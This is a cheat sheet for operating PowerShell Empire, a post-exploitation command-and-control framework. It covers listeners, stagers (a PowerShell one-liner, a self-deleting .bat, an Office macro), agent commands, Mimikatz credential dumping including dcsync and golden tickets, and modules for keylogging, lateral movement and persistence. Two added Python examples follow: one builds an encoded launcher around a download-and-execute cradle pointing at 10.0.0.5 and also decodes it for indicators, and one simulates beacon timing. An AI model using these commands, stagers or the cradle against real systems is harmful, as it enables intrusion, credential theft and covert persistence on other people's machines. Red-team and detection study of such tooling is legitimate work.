Empire Cheat Sheet
Veris Group, Adaptive Threat Division: http://www.verisgroup.com/adaptive-threat-division/
Documentation: http://www.PowerShellEmpire.com/ (http://www.PowerShellEmpire.com/?page_id=133)

Getting Started

  Get Empire:               # git clone https://github.com/PowerShellEmpire/Empire
                            or download the latest release from
                            https://github.com/PowerShellEmpire/Empire/releases
  Run setup:                # ./setup/install.sh
  Run Empire:               # ./empire
  Reset your installation:  # ./setup/reset.sh
  Documentation at:         http://www.PowerShellEmpire.com

Return to the main Empire menu at any point with main, exit with exit (or Ctrl+C). Go back to the previous menu with back. Type help at any point for a list of commands and their descriptions.

You can list all agents or listeners from any menu with list [agents/listeners].

To manually edit the backend db: # sqlitebrowser ./data/empire.db

Empire has a heavy UI focus with lots of tab-completion.

Logging and Downloads

  If -debug is specified, debug info is written to ./empire.debug
  Each agent that checks in has a complete log of tasking/results in ./downloads/AGENTNAME/agent.log
  Downloads and other module output for each agent are also stored in ./downloads/AGENTNAME/*

(Empire: listeners) >

Change to the listeners menu from any menu location in Empire with listeners. This shows the currently active listeners (list also shows this). Listeners are preserved in ./data/empire.db and start back up on Empire startup.

  Set an option                                        set OPTION VALUE
  Unset an option                                      unset OPTION
  Start a listener with the currently set options      execute
  Kill one (or all) listeners                          kill [tab] NAME/all
  Generate a launcher one-liner                        launcher LISTENER

Listener options:

  Name              Name alias to give the listener
  Type              native, pivot, hop, foreign, meter
  Host              http[s]://HOSTNAME:PORT for staging (also takes an IP)
  CertPath          Path to the .pem cert for HTTPS
  DefaultDelay      Agent delay/reach-back interval (in seconds)
  DefaultJitter     Jitter in the agent reach-back interval (0.0-1.0)
  DefaultLostLimit  Number of missed check-ins before the agent exits
  KillDate          Date for the listener's agents to exit (MM/dd/yyyy)
  WorkingHours      Hours for the agent to operate (09:00-17:00)

(Empire: stager/stager_name) >

Empire has a modular approach to generating stagers (the way you're going to get code execution on a remote machine). You can access these from main or listeners with usemodule [tab] STAGER [LISTENER_NAME]. info/options display the current option set, set/unset work the same way as in the listener menu, and generate produces the current stager with its options.

  launcher       Command one-liner
  launcher_bat   Self-deleting .bat file
  macro          An Office macro

(Empire: agents) >

Change to the agents menu from any menu location with agents. This shows the currently active agents/config and some basic system config information.

  List active (or stale) agents                          list [stale]
  Interact with an agent                                 interact ID
  Clear one (or all) agents' tasking                     clear [tab] ID/all
  Kill one (or all) agents                               kill [tab] ID/all
  Rename an agent                                        rename ID NEWNAME
  Set the working hours for one (or all) agents          workinghours [tab] ID/all 9:00-17:00
  Remove one, all, or stale agents from the database     remove [tab] ID/all/stale

(Empire: AGENTID) >

This is the main interactive menu for an Empire agent. Various shell aliases are available in the main agent menu: ls, mv, cp, rm, cd, ipconfig, getpid, route, whoami, restart, shutdown.

WARNING: any command entered that doesn't resolve to an alias or an agent command is executed as a native PowerShell command on the target!

  Display agent information                       info
  Clear the agent tasking                         clear
  Execute a (Power)shell command                  shell CMD
  List process names matching a pattern           ps explorer
  Download a target file                          download ./PATH/file
  Upload a file to the current path               upload ./attacker/path/file.txt
  Task the agent to exit                          exit
  Kill a background job                           jobs kill JOB_ID
  Kill a process                                  kill PID
  Get/set the agent kill date                     killdate [MM/dd/yyyy]
  Rename the agent                                rename NEWNAME
  Set the agent to sleep X seconds with 0.Y jitter   sleep X 0.Y
  Execute bypassuac                               bypassuac LISTENER
  Run Mimikatz                                    mimikatz
  Steal a process token                           steal_token PID
  Inject a given hash from the credential database   pth CRED_ID
  Import a .ps1 into memory                       scriptimport ./path.ps1
  Run an imported .ps1 cmd                        scriptcmd [tab] Invoke-Function
  Inject an Empire agent into another process     psinject [tab] LISTENER PID

Mimikatz and the Cred Store

Empire automatically scrapes parsed Mimikatz credentials and saves them in a backend credential model. These can be accessed from any menu with creds and are used by modules that accept a CredID.

  List all credentials          creds
  List only hashes              creds hash
  List only plaintext           creds plaintext
  Add a credential manually     creds add domain user password
  Remove a credential           creds remove CRED_ID/CRED1-CRED2/all
  Export current creds          creds export ./path/creds.csv
  Search credentials            creds *user*

Various Mimikatz functionality is implemented in credentials/mimikatz/*:

  logonpasswords    Execute all current Mimikatz in-memory credential modules
  lsadump           Dump local hashes from LSA (useful on a DC ;)
  dcsync            Dump DC hashes without DC code execution
  golden_ticket     Build/inject a golden ticket (accepts a krbtgt CRED_ID)
  purge             Purge all Kerberos tickets from the current session
  command           Custom Mimikatz command, e.g. sekurlsa::logonpasswords (accepts sekurlsa options, memssp, etc.)

Modules

To use a module from the main or agents menu, type usemodule [tab] type/module

To search module descriptions/names, use searchmodule TERM

Every module has a set of required [and optional] settings. On module execution, if a module is marked as needing administrative privileges or as not opsec safe, Empire prints a warning/confirmation.

You can see the current module options with info/options, and can set/unset options the same way as in the listener menu.

To set a module to run as an agent's first tasking after checking in: set Agent autorun. To clear the autorun tasking out, run clear autorun from the agents menu.

(Empire: type/module_name) >

Useful Modules

Empire has over 100 pure-PowerShell post-exploitation modules. Below is a brief highlight of a few particularly useful ones. These draw heavily on existing PowerShell tech, and the original authors of each are credited in the module's info output.

  collection/keylogger                        Logs keystrokes to /keylogs under the agent's downloads folder
  collection/get_indexed_item                 Query the Windows search indexer for files with specific terms
  collection/inveigh                          Basic LLMNR/NBNS spoofing
  collection/screenshot                       Takes screenshots
  lateral_movement/invoke_wmi                 Triggers a new agent on a remote host via WMI
  lateral_movement/invoke_psexec              Takes a listener name and triggers a new agent using PSEXEC
  management/psinject                         Inject an Empire agent into another process
  management/enable_rdp                       Enable RDP access
  management/wdigest_downgrade                Downgrade a system to use Wdigest and lock the screen
  persistence/userland/*                      Various userland persistence options
  persistence/elevated/*                      Various elevated persistence options
  persistence/misc/*                          Misc. persistence options
  privesc/powerup/*                           PowerUp privesc checks/weaponization vectors
  situational_awareness/network/powerview/*   Various PowerView network/domain functionality
  situational_awareness/host/*                Host situational awareness modules
  situational_awareness/network/*             Network-based recon modules
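The launcher stager above is a command one-liner, and the form it takes (powershell -Enc plus a base64 blob) is the same thing a defender has to unpack when it shows up in process-creation logs. The following is an added example, written for this page rather than taken from the Empire project: it packs a constructed stage-0 script the way -EncodedCommand expects (UTF-16LE, then base64), unpacks it again, and pulls out the strings a reviewer would flag. The flag set in build_launcher, the marker list, and the download-cradle script with its host and path are all assumptions, not Empire's real launcher body.

```python
"""Build and decode a PowerShell -EncodedCommand one-liner.

Added example, not code from the Empire project. Empire's `launcher`
stager emits a one-liner of this shape (powershell ... -Enc <base64>);
the stage-0 script below is a constructed placeholder, not the real
stager body, and the flag set in build_launcher is an assumption.
"""
import base64
from typing import List, Optional

# Constructed stand-in for a stage-0 download cradle; host and path are made up.
STAGE0 = "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://10.0.0.5:8080/index.asp')"

# Strings a reviewer of a decoded one-liner would flag (illustrative, not exhaustive).
MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String", "-W Hidden")


def build_launcher(script: str) -> str:
    """Pack a script the way -EncodedCommand expects: UTF-16LE bytes, then base64."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -NoP -NonI -W Hidden -Enc " + enc


def _is_enc_flag(tok: str) -> bool:
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    # -ExecutionPolicy / -ep are not prefixes of it and are correctly ignored.
    name = tok[1:].lower()
    return tok.startswith("-") and len(name) > 0 and "encodedcommand".startswith(name)


def decode_launcher(cmdline: str) -> Optional[str]:
    """Recover the script from a command line carrying -Enc; None if there is none."""
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if _is_enc_flag(tok):
            raw = base64.b64decode(parts[i + 1])
            return raw.decode("utf-16-le")
    return None


def launcher_indicators(cmdline: str) -> List[str]:
    """Markers found in the visible command line or in its decoded payload."""
    decoded = decode_launcher(cmdline) or ""
    text = cmdline + "\n" + decoded
    return sorted(m for m in MARKERS if m in text)


if __name__ == "__main__":
    one_liner = build_launcher(STAGE0)
    print(one_liner)
    print(decode_launcher(one_liner))
    print(launcher_indicators(one_liner))
```

The decoder deliberately matches every abbreviation PowerShell accepts for -EncodedCommand, because the one-liner in a log rarely spells the flag out; anything that keys only on the literal string "-EncodedCommand" misses the common "-Enc" and "-e" forms.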
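The listener options DefaultDelay, DefaultJitter, DefaultLostLimit, KillDate and WorkingHours (and the per-agent sleep X 0.Y and workinghours commands) together define when an agent calls home and when it gives up. The following is an added example, not Empire's agent or server code: a small Python model of that check-in loop that parses the option strings exactly as they are typed with set OPTION VALUE and then simulates the loop over constructed time ranges. The jitter formula (sleep uniformly within delay*(1-jitter) .. delay*(1+jitter)), the choice to idle until the next window start outside working hours, and the scenario dates are assumptions made for the example.

```python
"""Model of the beaconing parameters an Empire listener hands to its agents.

Added example, not Empire code. It shows what DefaultDelay, DefaultJitter,
DefaultLostLimit, KillDate and WorkingHours mean by simulating the agent's
check-in loop; the jitter convention and the idle-until-window behaviour
are assumptions, and every date below is constructed.
"""
import random
from dataclasses import dataclass
from datetime import datetime, time, timedelta
from typing import Callable, Optional, Tuple


@dataclass
class AgentConfig:
    delay: int = 5                                       # DefaultDelay, seconds
    jitter: float = 0.0                                  # DefaultJitter, 0.0-1.0
    lost_limit: int = 60                                 # DefaultLostLimit, missed check-ins
    kill_date: Optional[datetime] = None                 # KillDate, MM/dd/yyyy
    working_hours: Optional[Tuple[time, time]] = None    # WorkingHours, e.g. 09:00-17:00


def parse_config(opts: dict) -> AgentConfig:
    """Turn listener option strings (as typed with `set OPTION VALUE`) into a config."""
    cfg = AgentConfig(
        delay=int(opts.get("DefaultDelay", 5)),
        jitter=float(opts.get("DefaultJitter", 0.0)),
        lost_limit=int(opts.get("DefaultLostLimit", 60)),
    )
    if not 0.0 <= cfg.jitter <= 1.0:
        raise ValueError("DefaultJitter must be between 0.0 and 1.0")
    if opts.get("KillDate"):
        cfg.kill_date = datetime.strptime(opts["KillDate"], "%m/%d/%Y")
    if opts.get("WorkingHours"):
        start, end = (datetime.strptime(t.strip(), "%H:%M").time()
                      for t in opts["WorkingHours"].split("-"))
        cfg.working_hours = (start, end)
    return cfg


def next_sleep(cfg: AgentConfig, rng: random.Random) -> float:
    """Jittered sleep: uniform within delay*(1-jitter) .. delay*(1+jitter) (assumed convention)."""
    return cfg.delay * (1.0 + rng.uniform(-cfg.jitter, cfg.jitter))


def in_working_hours(cfg: AgentConfig, now: datetime) -> bool:
    if cfg.working_hours is None:
        return True
    start, end = cfg.working_hours          # same-day window only; overnight windows not modelled
    return start <= now.time() < end


def next_window_start(cfg: AgentConfig, now: datetime) -> datetime:
    """Earliest datetime after `now` at which the working-hours window opens."""
    start = datetime.combine(now.date(), cfg.working_hours[0])
    return start if now < start else start + timedelta(days=1)


def simulate(cfg: AgentConfig, start: datetime, end: datetime,
             server_up: Callable[[datetime], bool], rng: random.Random) -> Tuple[str, int]:
    """Run the check-in loop from start to end; returns (exit reason, successful check-ins)."""
    now, missed, checkins = start, 0, 0
    while now < end:
        if cfg.kill_date is not None and now >= cfg.kill_date:
            return "killdate", checkins
        if not in_working_hours(cfg, now):
            now = next_window_start(cfg, now)   # idle outside the window (assumed behaviour)
            continue
        if server_up(now):
            checkins, missed = checkins + 1, 0  # a successful check-in resets the lost counter
        else:
            missed += 1
            if missed >= cfg.lost_limit:
                return "lostlimit", checkins
        now += timedelta(seconds=next_sleep(cfg, rng))
    return "running", checkins


def demo() -> dict:
    """Four constructed scenarios; the listener is unreachable in the second one."""
    always_up, always_down = (lambda t: True), (lambda t: False)
    hours = parse_config({"DefaultDelay": "60", "DefaultJitter": "0", "WorkingHours": "9:00-17:00"})
    lost = AgentConfig(delay=10, lost_limit=3)
    kill = AgentConfig(delay=10, kill_date=datetime(2016, 1, 2))
    jit = AgentConfig(delay=10, jitter=0.5)
    rng = random.Random(7)
    samples = [next_sleep(jit, rng) for _ in range(1000)]
    return {
        "working_hours": simulate(hours, datetime(2016, 1, 1, 8, 59), datetime(2016, 1, 1, 9, 5), always_up, rng),
        "lost_limit": simulate(lost, datetime(2016, 1, 1), datetime(2016, 1, 2), always_down, rng),
        "kill_date": simulate(kill, datetime(2016, 1, 1, 23, 59, 30), datetime(2016, 1, 3), always_up, rng),
        "jitter_range": (min(samples), max(samples)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The lost-limit case is the one worth internalising: an agent that cannot reach its listener exits after DefaultLostLimit consecutive misses, so tearing a listener down with kill NAME (instead of leaving it up and tasking agents to exit) leaves agents running until that counter or the kill date expires.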